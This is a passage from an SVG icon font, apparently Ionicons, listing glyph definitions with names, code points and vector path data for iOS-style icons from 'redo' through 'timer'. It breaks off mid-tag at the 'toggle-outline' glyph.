    <glyph glyph-name="ion-ios-redo-outline" unicode="&#xf498;" horiz-adv-x="384" 
d="M0 48v32c0 17 -3 83 49 136c35 36 80 53 143 56v80l192 -128l-192 -128v80c-40 -1 -63 -9 -87 -20c-31 -14 -55 -44 -75 -77l-20 -31h-10zM208 256c-201 0 -192 -169 -192 -169c48 81 101 105 192 105v-65l148 97l-148 97v-65z" />
    <glyph glyph-name="ion-ios-redo" unicode="&#xf499;" horiz-adv-x="384" 
d="M0 48v32c0 17 -3 83 49 136c35 36 80 53 143 56v80l192 -128l-192 -128v80c-40 -1 -63 -9 -87 -20c-31 -14 -55 -44 -75 -77l-20 -31h-10z" />
    <glyph glyph-name="ion-ios-refresh-empty" unicode="&#xf49a;" horiz-adv-x="256" 
d="M128 64c-71 0 -128 57 -128 128s57 128 128 128v44l96 -64l-96 -56v56c-60 0 -108 -48 -108 -108s48 -108 108 -108s108 48 108 108h20c0 -71 -57 -128 -128 -128z" />
    <glyph glyph-name="ion-ios-refresh-outline" unicode="&#xf49b;" horiz-adv-x="416" 
d="M316 192v0h20c0 -71 -57 -128 -128 -128s-128 57 -128 128s57 128 128 128v44l96 -64l-96 -56v56c-60 0 -108 -48 -108 -108s48 -108 108 -108s108 48 108 108zM208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1
c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191z" />
    <glyph glyph-name="ion-ios-refresh" unicode="&#xf49c;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 64c71 0 128 57 128 128h-20c0 -60 -48 -108 -108 -108s-108 48 -108 108s48 108 108 108v-56l96 56l-96 64v-44c-71 0 -128 -57 -128 -128s57 -128 128 -128z" />
    <glyph glyph-name="ion-ios-reload" unicode="&#xf49d;" 
d="M192 384c106 0 192 -86 192 -192l55 53l9 -9l-70 -68l-67 68l9 9l51 -52c0 98 -80 178 -179 178s-179 -80 -179 -179s80 -179 179 -179c79 0 146 50 170 121l12 -3c-26 -76 -97 -131 -182 -131c-106 0 -192 86 -192 192s86 192 192 192z" />
    <glyph glyph-name="ion-ios-reverse-camera-outline" unicode="&#xf49e;" horiz-adv-x="384" 
d="M238 129l2 2l11 -12l-2 -2c-16 -14 -36 -21 -57 -21c-45 0 -82 36 -87 78h-30l38 50l39 -50h-31c5 -33 35 -62 71 -62c17 0 33 6 46 17zM252 249c16 -14 25 -37 27 -57h30l-38 -51l-39 51h31c-5 35 -35 64 -71 64c-17 0 -33 -6 -46 -17l-2 -2l-11 12l2 2
c16 14 36 21 57 21c22 0 44 -8 60 -23zM354 288c18 0 30 -14 30 -31v-176c0 -17 -12 -33 -30 -33h-320c-18 0 -34 16 -34 33v176c0 17 16 31 34 31h13v16h34v-16h13c32 36 43 48 55 48h88c12 0 23 -12 55 -48h62zM368 81v176c0 9 -5 15 -14 15h-62h-6s-4 1 -6 3s-6 8 -9 11
c-12 13 -21 24 -27 30c-5 5 -7 4 -7 4h-88s-1 0 -6 -4c-6 -5 -15 -14 -26 -27c-3 -4 -8 -11 -11 -14s-4 -3 -6 -3h-6h-60c-9 0 -18 -7 -18 -15v-176c0 -9 9 -17 18 -17h320c8 0 14 8 14 17z" />
    <glyph glyph-name="ion-ios-reverse-camera" unicode="&#xf49f;" horiz-adv-x="384" 
d="M354 288c18 0 30 -14 30 -31v-176c0 -17 -12 -33 -30 -33h-320c-18 0 -34 16 -34 33v176c0 17 16 31 34 31h13v16h34v-16h13c32 36 43 48 55 48h88c12 0 23 -12 55 -48h62zM249 117l2 2l-11 12l-2 -2c-13 -11 -29 -17 -46 -17c-36 0 -66 29 -71 62h31l-39 50l-38 -50h30
c5 -42 42 -78 87 -78c21 0 41 7 57 21zM271 141l38 51h-30c-2 20 -11 43 -27 57c-16 15 -38 23 -60 23c-21 0 -41 -7 -57 -21l-2 -2l11 -12l2 2c13 11 29 17 46 17c36 0 66 -29 71 -64h-31z" />
    <glyph glyph-name="ion-ios-rewind-outline" unicode="&#xf4a0;" 
d="M432 293l-184 -101l184 -101v202zM208 292v0l-176 -100l176 -100v95v27v78zM224 320v0v-123l224 123v-256l-224 123v-123l-224 128z" />
    <glyph glyph-name="ion-ios-rewind" unicode="&#xf4a1;" 
d="M224 320v0v-123l224 123v-256l-224 123v-123l-224 128z" />
    <glyph glyph-name="ion-ios-rose-outline" unicode="&#xf4a2;" horiz-adv-x="320" 
d="M284 295c-4 -1 -9 -3 -13 -4c-37 -11 -71 -24 -103 -39c-17 -8 -24 -12 -44 -24l-7 -4c-31 -18 -50 -33 -63 -51c-15 -21 -22 -45 -22 -77c0 -16 3 -30 9 -44c6 -13 14 -26 25 -36c23 -21 55 -32 94 -32s71 11 94 32c11 10 19 23 25 36c6 14 9 28 9 44c0 20 -5 40 -11 60
c-11 40 -23 83 7 139zM320 320v0c-77 -96 -16 -151 -16 -224s-56 -128 -144 -128s-144 55 -144 128s35 109 93 142c25 14 33 19 52 28c30 14 65 28 105 40c17 5 35 10 54 14zM38 325c14 -28 18 -57 19 -83c9 7 20 13 30 20c7 4 14 9 21 13c5 3 10 6 16 9c-5 4 -11 7 -17 11
c-22 13 -48 23 -69 30zM0 352v0s66 -15 115 -43c15 -8 28 -18 37 -29c-12 -6 -24 -12 -36 -19c-7 -4 -14 -8 -20 -12c-25 -16 -44 -31 -57 -42c5 41 2 98 -39 145zM249 367c-8 -1 -20 -2 -35 -7c-25 -8 -47 -20 -64 -36c8 -6 15 -12 21 -18c29 12 65 26 95 34
c-5 10 -12 20 -17 27zM256 384v0s26 -32 32 -55c-33 -8 -84 -25 -121 -42l-3 3c-9 11 -22 22 -39 32c52 60 131 62 131 62zM85 394c-6 -10 -10 -20 -14 -28c12 -4 22 -10 36 -17c4 5 9 10 14 14c-13 15 -27 25 -36 31zM80 416v0s35 -16 64 -56c-12 -9 -23 -20 -33 -31
c-26 13 -40 21 -61 27c5 15 15 38 30 60z" />
    <glyph glyph-name="ion-ios-rose" unicode="&#xf4a3;" horiz-adv-x="320" 
d="M320 320v0c-77 -96 -16 -151 -16 -224s-56 -128 -144 -128s-144 55 -144 128s35 109 93 142c25 14 33 19 52 28c30 14 65 28 105 40c17 5 35 10 54 14zM0 352v0s66 -15 115 -43c15 -8 28 -18 37 -29c-12 -6 -24 -12 -36 -19c-7 -4 -14 -8 -20 -12
c-25 -16 -44 -31 -57 -42c5 41 2 98 -39 145zM256 384v0s26 -32 32 -55c-33 -8 -84 -25 -121 -42l-3 3c-9 11 -22 22 -39 32c52 60 131 62 131 62zM80 416v0s35 -16 64 -56c-12 -9 -23 -20 -33 -31c-26 13 -40 21 -61 27c5 15 15 38 30 60z" />
    <glyph glyph-name="ion-ios-search-strong" unicode="&#xf4a4;" horiz-adv-x="384" 
d="M280 150l-4 -7l108 -109l-34 -34l-108 109l-7 -5c-24 -15 -53 -25 -83 -25c-84 0 -152 69 -152 153s68 152 152 152s152 -68 152 -152c0 -30 -9 -58 -24 -82zM237 317c-23 23 -53 35 -85 35s-62 -12 -85 -35s-35 -53 -35 -85s12 -62 35 -85s53 -35 85 -35s62 12 85 35
s36 53 36 85s-13 62 -36 85z" />
    <glyph glyph-name="ion-ios-search" unicode="&#xf4a5;" horiz-adv-x="384" 
d="M384 23l-23 -23l-113 113c-26 -21 -60 -33 -96 -33c-84 0 -152 68 -152 152s68 152 152 152s152 -68 152 -152c0 -36 -12 -69 -33 -95zM56 135c26 -26 60 -39 96 -39s70 14 96 40s40 60 40 96s-14 70 -40 96s-60 40 -96 40s-70 -14 -96 -40s-40 -60 -40 -96
s14 -71 40 -97z" />
    <glyph glyph-name="ion-ios-settings-strong" unicode="&#xf4a6;" 
d="M0 72h283c6 14 21 24 37 24s31 -10 37 -24h91v-32h-91c-6 -14 -21 -24 -37 -24s-31 10 -37 24h-283zM0 208h91c6 14 21 24 37 24s31 -10 37 -24h283v-32h-283c-6 -14 -21 -24 -37 -24s-31 10 -37 24h-91zM0 344h283c6 14 21 24 37 24s31 -10 37 -24h91v-32h-91
c-6 -14 -21 -24 -37 -24s-31 10 -37 24h-283z" />
    <glyph glyph-name="ion-ios-settings" unicode="&#xf4a7;" 
d="M320 344c-9 0 -16 -7 -16 -16s7 -16 16 -16s16 7 16 16s-7 16 -16 16zM320 360v0c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32zM320 72c-9 0 -16 -7 -16 -16s7 -16 16 -16s16 7 16 16s-7 16 -16 16zM320 88v0c18 0 32 -14 32 -32s-14 -32 -32 -32
s-32 14 -32 32s14 32 32 32zM128 208c-9 0 -16 -7 -16 -16s7 -16 16 -16s16 7 16 16s-7 16 -16 16zM128 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32zM175 200h273v-16h-273c0 3 1 5 1 8s-1 5 -1 8zM80 192c0 -3 1 -5 1 -8h-81v16h81
c0 -3 -1 -5 -1 -8zM367 64h81v-16h-81c0 3 1 5 1 8s-1 5 -1 8zM272 56c0 -3 1 -5 1 -8h-273v16h273c0 -3 -1 -5 -1 -8zM367 336h81v-16h-81c0 3 1 5 1 8s-1 5 -1 8zM273 336c0 -3 -1 -5 -1 -8s1 -5 1 -8h-273v16h273z" />
    <glyph glyph-name="ion-ios-shuffle-strong" unicode="&#xf4a8;" horiz-adv-x="384" 
d="M301 296c-85 0 -119 -64 -152 -126c-1 -3 -3 -5 -4 -8l-1 -1c-2 -3 -2 -5 -4 -8c-21 -38 -43 -68 -68 -83c-15 -9 -34 -18 -72 -18v32c45 0 76 18 112 84c2 3 2 6 4 9h1c1 2 3 4 4 7c34 64 76 144 180 144h15l-52 43l21 25l99 -84l-99 -82l-21 24l51 42h-14zM285 154
l99 -82l-99 -84l-21 25l52 43h-15c-78 0 -122 45 -153 95l18 33c29 -51 64 -96 135 -96h14l-51 42zM112 216c-36 66 -67 84 -112 84v32c38 0 57 -9 72 -18c25 -15 47 -44 67 -81c-7 -11 -13 -22 -19 -33c-1 2 -2 5 -3 7h-1c-2 3 -2 6 -4 9z" />
    <glyph glyph-name="ion-ios-shuffle" unicode="&#xf4a9;" horiz-adv-x="384" 
d="M298 241l-10 12l62 51h-46c-93 0 -129 -75 -164 -139c-2 -3 -3 -6 -5 -9c-20 -37 -41 -61 -65 -75c-14 -8 -33 -17 -70 -17v16c48 0 83 14 121 84c2 3 3 6 5 9c35 65 75 147 178 147h46l-62 52l10 12l86 -72zM135 228c0 -1 1 -2 1 -3c-3 -5 -6 -11 -9 -16c0 1 -1 1 -1 2
c-2 3 -3 6 -5 9c-38 70 -73 84 -121 84v16c37 0 56 -9 70 -17c24 -14 45 -38 65 -75zM298 143l86 -71l-86 -72l-10 12l62 52h-46c-76 0 -118 45 -149 95c1 2 2 5 3 7c2 3 4 7 6 10c30 -50 67 -96 140 -96h46l-62 51z" />
    <glyph glyph-name="ion-ios-skipbackward-outline" unicode="&#xf4aa;" horiz-adv-x="320" 
d="M0 352h79v-142l241 142v-320l-241 142v-142h-79v320zM80 192l7 -4l217 -128v264v0l-217 -128zM16 336v-288h47v126v8v28v126h-47z" />
    <glyph glyph-name="ion-ios-skipbackward" unicode="&#xf4ab;" horiz-adv-x="320" 
d="M0 352h79v-142l241 142v-320l-241 142v-142h-79v320z" />
    <glyph glyph-name="ion-ios-skipforward-outline" unicode="&#xf4ac;" horiz-adv-x="320" 
d="M241 352h79v-320h-79v142l-241 -142v320l241 -142v142zM233 188l7 4l-7 4l-217 128v0v-264zM304 48v288h-47v-126v-28v-8v-126h47z" />
    <glyph glyph-name="ion-ios-skipforward" unicode="&#xf4ad;" horiz-adv-x="320" 
d="M241 352h79v-320h-79v142l-241 -142v320l241 -142v142z" />
    <glyph glyph-name="ion-ios-snowy" unicode="&#xf4ae;" horiz-adv-x="256" 
d="M252 131c4 -2 5 -7 3 -11s-7 -5 -11 -3l-29 17c-2 -8 -2 -16 0 -24c1 -4 -3 -9 -7 -10s-8 2 -9 6c-2 12 -3 24 1 36l-64 36v-73c11 -3 22 -8 31 -16c3 -3 4 -8 1 -11s-8 -4 -11 -1c-6 5 -13 10 -21 12v-33c0 -4 -4 -8 -8 -8s-8 4 -8 8v33c-8 -2 -15 -7 -21 -12
c-3 -3 -8 -2 -11 1s-3 8 0 11c9 8 20 13 32 16v73l-65 -36c4 -12 4 -23 2 -35c-1 -4 -5 -8 -9 -7s-8 6 -7 10c2 8 2 16 0 24l-29 -17c-4 -2 -9 -1 -11 3s-1 9 3 11l29 16c-6 6 -13 10 -21 13c-4 1 -6 6 -5 10c2 4 6 6 10 5c12 -4 22 -11 30 -19l65 36l-65 37
c-8 -9 -18 -15 -30 -19c-4 -1 -9 0 -10 4s1 10 5 11c8 3 15 6 21 12l-29 16c-4 2 -5 7 -3 11s7 5 11 3l29 -16c2 8 2 15 0 23c-1 4 3 9 7 10s8 -2 9 -6c2 -12 1 -25 -2 -36l65 -36v73c-12 3 -23 8 -32 16c-3 3 -3 8 0 11s8 4 11 1c6 -5 13 -10 21 -12v33c0 4 4 8 8 8
s8 -4 8 -8v-33c8 2 15 7 21 12c3 3 8 2 11 -1s2 -8 -1 -11c-9 -8 -20 -13 -31 -16v-73l64 36c-3 11 -4 24 -2 36c1 4 6 7 10 6s7 -6 6 -10c-2 -8 -1 -15 1 -23l29 16c4 2 9 1 11 -3s1 -9 -3 -11l-29 -16c6 -6 13 -10 21 -13c4 -1 6 -6 5 -10s-6 -6 -10 -5
c-12 4 -23 10 -31 19l-64 -36l64 -36c8 8 19 15 31 19c4 1 9 -1 10 -5s-1 -9 -5 -10c-8 -3 -15 -7 -21 -13z" />
    <glyph glyph-name="ion-ios-speedometer-outline" unicode="&#xf4af;" 
d="M224 384c124 0 224 -100 224 -224c0 -57 -21 -108 -56 -148c-4 -4 -7 -8 -11 -12l-10 10l-1 2c-19 18 -41 33 -65 43c-26 11 -53 16 -81 16s-55 -5 -81 -16c-24 -10 -46 -25 -65 -43l-1 -2l-10 -10c-4 4 -7 8 -11 12c-35 40 -56 91 -56 148c0 124 100 224 224 224z
M416 79c10 23 15 48 16 73h-32v16h32c-1 25 -6 50 -16 73c-9 22 -23 42 -39 60l-27 -27l-6 6l-5 5v0h-1l27 27c-18 17 -38 31 -60 40c-23 10 -48 15 -74 16v-38h-16v38c-25 -1 -49 -6 -72 -16c-22 -10 -43 -23 -61 -40l27 -27v0v0l-6 -6l-5 -5l-27 27
c-16 -18 -30 -38 -39 -60c-10 -23 -15 -49 -16 -74h32v-16h-32c1 -25 6 -49 16 -72c9 -20 20 -39 35 -56c40 40 96 64 157 64s117 -24 157 -64c15 17 26 36 35 56zM336 273l2 -1l-75 -84c6 -8 9 -18 9 -28c0 -26 -22 -48 -48 -48c-10 0 -19 4 -27 9l-13 -12l-11 11l12 12
c-6 8 -9 18 -9 28c0 26 22 48 48 48c10 0 19 -3 27 -8zM224 128c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32s14 -32 32 -32z" />
    <glyph glyph-name="ion-ios-speedometer" unicode="&#xf4b0;" 
d="M385 169v-15h30c-1 -22 -6 -44 -15 -65c-8 -18 -19 -35 -32 -50c-39 37 -90 58 -144 58s-105 -21 -144 -58c-13 15 -24 32 -32 50c-9 21 -14 43 -15 65h28h1v16h-29c1 23 6 45 15 66c9 20 20 38 35 54l25 -24l10 10l1 1v0v0l-25 25c16 15 36 26 56 35c21 9 43 14 66 15
v-34h14h1v34c23 -1 46 -6 67 -15s39 -20 55 -35l-24 -25l11 -11l25 25c15 -16 26 -35 35 -55c9 -21 14 -43 15 -66h-30v-1zM272 160c0 10 -3 20 -9 28l63 76l-2 1l-73 -65c-8 5 -17 8 -27 8c-26 0 -48 -22 -48 -48c0 -10 3 -20 9 -28l-12 -12l11 -11l13 12c8 -5 17 -9 27 -9
c26 0 48 22 48 48zM224 384c124 0 224 -100 224 -224c0 -57 -21 -108 -56 -148c-4 -4 -7 -8 -11 -12h-23c-32 39 -80 64 -134 64s-102 -25 -134 -64h-23c-4 4 -7 8 -11 12c-35 40 -56 91 -56 148c0 124 100 224 224 224zM379 27c34 37 52 86 52 136c0 55 -22 106 -61 145
s-91 60 -146 60s-107 -21 -146 -60s-61 -90 -61 -145c0 -50 18 -99 52 -136l10 -10l1 -1v1l9 9l1 1v0c17 17 38 30 60 39c24 10 48 15 74 15s50 -5 74 -15c22 -9 43 -22 60 -39v0l1 -1l9 -9v-1l1 1zM192 160c0 21 11 32 32 32s32 -11 32 -32s-11 -32 -32 -32s-32 11 -32 32z
" />
    <glyph glyph-name="ion-ios-star-half" unicode="&#xf4b1;" 
d="M140 143l-140 98h171l53 159l53 -159h171l-140 -98l54 -159l-138 99l-138 -99zM224 347v-244l107 -76l-43 122l108 75h-131z" />
    <glyph glyph-name="ion-ios-star-outline" unicode="&#xf4b2;" 
d="M448 241l-140 -98l54 -159l-138 99l-138 -99l54 159l-140 98h171l53 159l53 -159h171zM331 27l-43 122l108 75h-131l-41 123l-41 -123h-131l108 -75l-43 -122l107 76z" />
    <glyph glyph-name="ion-ios-star" unicode="&#xf4b3;" 
d="M448 241l-140 -98l54 -159l-138 99l-138 -99l54 159l-140 98h171l53 159l53 -159h171z" />
    <glyph glyph-name="ion-ios-stopwatch-outline" unicode="&#xf4b4;" horiz-adv-x="384" 
d="M334 301c32 -35 50 -80 50 -128c0 -104 -86 -189 -192 -189s-192 85 -192 189c0 48 18 94 51 129l1 1h-18l-8 -8l-23 23l41 40l23 -22l-9 -9v-18c31 30 72 50 116 53h2v38h32v-38c43 -4 82 -21 113 -49l5 -5v19l-9 9l23 22l41 -40l-22 -23l-9 8h-18zM192 2
c96 0 173 77 173 171s-77 171 -173 171c-95 0 -173 -77 -173 -171s77 -171 173 -171zM200 191c14 -4 24 -17 24 -31c0 -15 -10 -26 -24 -30l-8 -18v0l-8 18c-14 4 -24 15 -24 30c0 14 12 27 24 31v129h16v-129z" />
    <glyph glyph-name="ion-ios-stopwatch" unicode="&#xf4b5;" horiz-adv-x="384" 
d="M334 301c32 -35 50 -80 50 -128c0 -104 -86 -189 -192 -189s-192 85 -192 189c0 48 18 94 51 129l1 1h-18l-8 -8l-23 23l41 40l23 -22l-9 -9v-18c31 30 72 50 116 53h2v38h32v-38c43 -4 82 -21 113 -49l5 -5v19l-9 9l23 22l41 -40l-22 -23l-9 8h-18zM200 130
c14 4 24 15 24 30c0 14 -10 27 -24 31v129h-16v-129c-12 -4 -24 -17 -24 -31c0 -15 10 -26 24 -30l8 -18z" />
    <glyph glyph-name="ion-ios-sunny-outline" unicode="&#xf4b6;" horiz-adv-x="320" 
d="M151 296v56h18v-56h-18zM151 32v60h18v-60h-18zM264 183v18h56v-18h-56zM0 183v18h60v-18h-60zM240 130l34 -34l-12 -12l-33 34zM64 306l34 -33l-12 -12l-34 34zM229 272l33 34l12 -12l-34 -33zM52 96l34 34l11 -12l-33 -34zM160 116c-42 0 -76 34 -76 76s34 76 76 76
s76 -34 76 -76s-34 -76 -76 -76zM160 251c-32 0 -59 -27 -59 -59s27 -59 59 -59s59 27 59 59s-27 59 -59 59z" />
    <glyph glyph-name="ion-ios-sunny" unicode="&#xf4b7;" horiz-adv-x="320" 
d="M151 296v56h18v-56h-18zM151 32v60h18v-60h-18zM264 183v18h56v-18h-56zM0 183v18h60v-18h-60zM240 130l34 -34l-12 -12l-33 34zM64 306l34 -33l-12 -12l-34 34zM229 272l33 34l12 -12l-34 -33zM52 96l34 34l11 -12l-33 -34zM160 116c-42 0 -76 34 -76 76s34 76 76 76
s76 -34 76 -76s-34 -76 -76 -76z" />
    <glyph glyph-name="ion-ios-telephone-outline" unicode="&#xf4b8;" horiz-adv-x="352" 
d="M336 112c16 -16 26 -35 0 -66c-25 -30 -42 -30 -64 -30c-24 0 -58 14 -93 40c-32 23 -46 34 -78 67c-34 35 -55 64 -79 107c-27 50 -24 74 -18 92c4 12 14 24 28 33l1 1c6 4 18 12 32 12c13 0 24 -6 34 -18l1 -1c11 -14 24 -31 32 -47c10 -21 10 -38 -1 -53
c-9 -12 -12 -19 -12 -23s5 -9 13 -18l1 -1c16 -18 20 -23 26 -29c1 -1 3 -2 4 -3l2 -2c7 -7 11 -12 29 -28l1 -1c7 -6 9 -8 12 -8c5 0 16 7 29 15c4 3 11 5 17 5c27 0 68 -29 83 -44zM324 57c19 22 13 31 1 43c-13 14 -50 39 -72 39c-3 0 -6 -1 -8 -2
c-19 -12 -28 -18 -37 -18s-15 6 -23 13h-1c-19 16 -23 21 -30 29l-2 2c-1 1 -3 2 -4 3c-6 6 -11 12 -27 30v1c-10 11 -17 18 -18 28s5 20 16 34c15 20 -5 48 -31 79l-1 1c-7 8 -14 12 -22 12c-10 0 -18 -6 -23 -9c-1 0 -2 -1 -2 -1c-11 -7 -18 -16 -21 -24
c-5 -16 -7 -35 17 -79c23 -42 43 -70 76 -104c31 -32 45 -42 76 -64c32 -23 64 -38 84 -38c21 0 32 1 52 25z" />
    <glyph glyph-name="ion-ios-telephone" unicode="&#xf4b9;" horiz-adv-x="352" 
d="M336 112c16 -16 26 -35 0 -66c-25 -30 -42 -30 -64 -30c-24 0 -58 14 -93 40c-32 23 -46 34 -78 67c-34 35 -55 64 -79 107c-27 50 -24 74 -18 92c4 12 14 24 28 33l1 1c6 4 18 12 32 12c13 0 24 -6 34 -18l1 -1c11 -14 24 -31 32 -47c10 -21 10 -38 -1 -53
c-9 -12 -12 -19 -12 -23s5 -9 13 -18l1 -1c16 -18 20 -23 26 -29c1 -1 3 -2 4 -3l2 -2c7 -7 11 -12 29 -28l1 -1c7 -6 9 -8 12 -8c5 0 16 7 29 15c4 3 11 5 17 5c27 0 68 -29 83 -44z" />
    <glyph glyph-name="ion-ios-tennisball-outline" unicode="&#xf4ba;" horiz-adv-x="416" 
d="M416 192v-8v0c0 -5 0 -11 -1 -16v0c-11 -97 -90 -174 -187 -183v0h-4h-2s-1 -1 -2 -1h-3h-1h-8c-115 0 -208 93 -208 208s93 208 208 208s208 -93 208 -208zM399 192c0 105 -86 191 -191 191c-3 0 -5 -1 -8 -1c1 -24 6 -46 15 -68c10 -26 26 -49 46 -69s43 -36 69 -46
c22 -9 44 -14 68 -15c0 3 1 5 1 8zM17 192c0 -105 86 -191 191 -191h4c-1 22 -7 45 -15 66c-10 26 -26 48 -46 68s-42 36 -68 46c-21 8 -44 14 -66 15v-4zM228 2c88 9 158 78 169 166c-54 3 -106 25 -147 66s-63 93 -66 147c-88 -11 -157 -81 -166 -169
c53 -3 105 -25 145 -65s62 -92 65 -145z" />
    <glyph glyph-name="ion-ios-tennisball" unicode="&#xf4bb;" horiz-adv-x="416" 
d="M0 196v0v0v0zM212 -16h1h-1v0zM208 400c115 0 208 -93 208 -208c0 -8 0 -16 -1 -24v0v0c-11 -97 -90 -174 -187 -183v0v0c-6 -1 -13 -1 -20 -1c-115 0 -208 93 -208 208v4v0v0c0 6 0 11 1 16v0v0c9 97 86 176 183 187v0v0c6 1 11 1 16 1v0v0h8zM83 181
c26 -10 48 -26 68 -46s36 -42 46 -68c8 -21 14 -44 15 -66c5 0 11 0 16 1c-3 53 -25 105 -65 145s-92 62 -145 65c-1 -5 -1 -11 -1 -16c22 -1 45 -7 66 -15zM250 234c41 -41 93 -63 147 -66c1 5 1 11 1 16c-24 1 -46 6 -68 15c-26 10 -49 26 -69 46s-36 43 -46 69
c-9 22 -14 44 -15 68c-5 0 -11 0 -16 -1c3 -54 25 -106 66 -147z" />
    <glyph glyph-name="ion-ios-thunderstorm-outline" unicode="&#xf4bc;" horiz-adv-x="274" 
d="M193 176l-88 -128l29 96h-52l15 80h72l-16 -48h40zM209 275c36 0 65 -29 65 -65s-29 -66 -65 -66h-8v17h8c27 0 49 22 49 49s-22 50 -49 50h-6l-14 -2l-3 14c-3 14 -11 26 -22 35s-25 13 -39 13c-34 0 -63 -27 -63 -62v-12s1 -9 1 -9c-5 0 -12 -2 -14 -2
c-19 -3 -33 -18 -33 -37c0 -10 3 -19 10 -26s16 -11 26 -11h11v-17h-11c-28 0 -52 24 -52 53c0 27 21 51 47 53v8c0 43 35 78 78 78c37 0 68 -26 76 -61h8z" />
    <glyph glyph-name="ion-ios-thunderstorm" unicode="&#xf4bd;" horiz-adv-x="274" 
d="M153 176h40l-22 -32l-66 -96l29 96h-52l15 80h72zM84 240h107l-16 -48h18h30l-33 -48h19c36 0 65 30 65 66s-29 65 -65 65h-8c-8 35 -39 61 -76 61c-43 0 -78 -35 -78 -78v-8c-26 -2 -47 -26 -47 -53c0 -29 24 -53 52 -53h14z" />
    <glyph glyph-name="ion-ios-time-outline" unicode="&#xf4be;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM371 45c19 19 35 41 45 66c11 26 16 53 16 81s-5 55 -16 81c-10 25 -26 47 -45 66s-41 35 -66 45c-26 11 -53 16 -81 16s-55 -5 -81 -16c-25 -10 -47 -26 -66 -45
s-35 -41 -45 -66c-11 -26 -16 -53 -16 -81s5 -55 16 -81c10 -25 26 -47 45 -66s41 -35 66 -45c26 -11 53 -16 81 -16s55 5 81 16c25 10 47 26 66 45zM216 368c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM216 16c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM392 192
c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM40 192c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM128 344c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM304 40c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM368 280c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8
zM64 104c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM64 280c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM368 104c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM304 344c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8s-8 3 -8 8zM128 40c0 5 3 8 8 8s8 -3 8 -8s-3 -8 -8 -8
s-8 3 -8 8zM238 200c4 -8 2 -18 -6 -22v-122c0 -4 -4 -8 -8 -8s-8 4 -8 8v122c-2 1 -4 4 -6 6c-3 5 -3 11 0 16l-37 63c-2 4 -1 9 3 11s8 1 10 -3l38 -63c5 0 11 -3 14 -8z" />
    <glyph glyph-name="ion-ios-time" unicode="&#xf4bf;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM224 376c-4 0 -8 -4 -8 -8s4 -8 8 -8s8 4 8 8s-4 8 -8 8zM48 184c4 0 8 4 8 8s-4 8 -8 8s-8 -4 -8 -8s4 -8 8 -8zM76 97c4 2 4 7 2 11s-6 5 -10 3s-5 -7 -3 -11s7 -5 11 -3z
M78 276c2 4 2 9 -2 11s-9 1 -11 -3s-1 -9 3 -11s8 -1 10 3zM132 351c-4 -2 -5 -7 -3 -11s7 -4 11 -2s5 6 3 10s-7 5 -11 3zM143 36c2 4 1 8 -3 10s-9 2 -11 -2s-1 -9 3 -11s9 -1 11 3zM224 8c4 0 8 4 8 8s-4 8 -8 8s-8 -4 -8 -8s4 -8 8 -8zM232 178c8 4 10 14 6 22
c-3 5 -9 8 -14 8l-38 64c-2 4 -7 4 -11 2s-4 -7 -2 -11l37 -63c-3 -5 -3 -11 0 -16c2 -2 4 -5 6 -6v-122c0 -4 4 -8 8 -8s8 4 8 8v122zM316 33c4 2 5 7 3 11s-7 4 -11 2s-5 -6 -3 -10s7 -5 11 -3zM319 340c2 4 1 9 -3 11s-9 1 -11 -3s-1 -8 3 -10s9 -2 11 2zM383 100
c2 4 1 9 -3 11s-8 1 -10 -3s-2 -9 2 -11s9 -1 11 3zM380 273c4 2 5 7 3 11s-7 5 -11 3s-4 -7 -2 -11s6 -5 10 -3zM400 184c4 0 8 4 8 8s-4 8 -8 8s-8 -4 -8 -8s4 -8 8 -8z" />
    <glyph glyph-name="ion-ios-timer-outline" unicode="&#xf4c0;" horiz-adv-x="416" 
d="M189 176l-1 2s-89 118 -86 120s121 -85 121 -85c1 -1 1 -2 2 -3c5 -5 8 -11 8 -18c0 -14 -11 -25 -25 -25c-8 0 -14 3 -19 9zM208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208c0 57 23 109 61 147l12 -12c-35 -35 -56 -82 -56 -135
c0 -106 85 -191 191 -191s191 85 191 191c0 100 -77 183 -175 191v-95h-16v112v0v0z" />
    <glyph glyph-name="ion-ios-timer" unicode="&#xf4c1;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM102 298c-2 -2 86 -120 86 -120l1 -1c5 -6 11 -10 19 -10c14 0 25 11 25 25c0 7 -3 13 -8 18l-3 3c0 0 -117 87 -120 85zM208 1c106 0 192 85 192 191s-86 192 -192 192v-96h16v78
c88 -9 158 -84 158 -174c0 -96 -78 -174 -174 -174s-175 78 -175 174c0 48 19 92 51 124l-11 12c-35 -35 -56 -83 -56 -136c0 -106 85 -191 191 -191z" />
    <glyph glyph-name="ion-ios-toggle-outline" unicode="&#xf4c2;" 
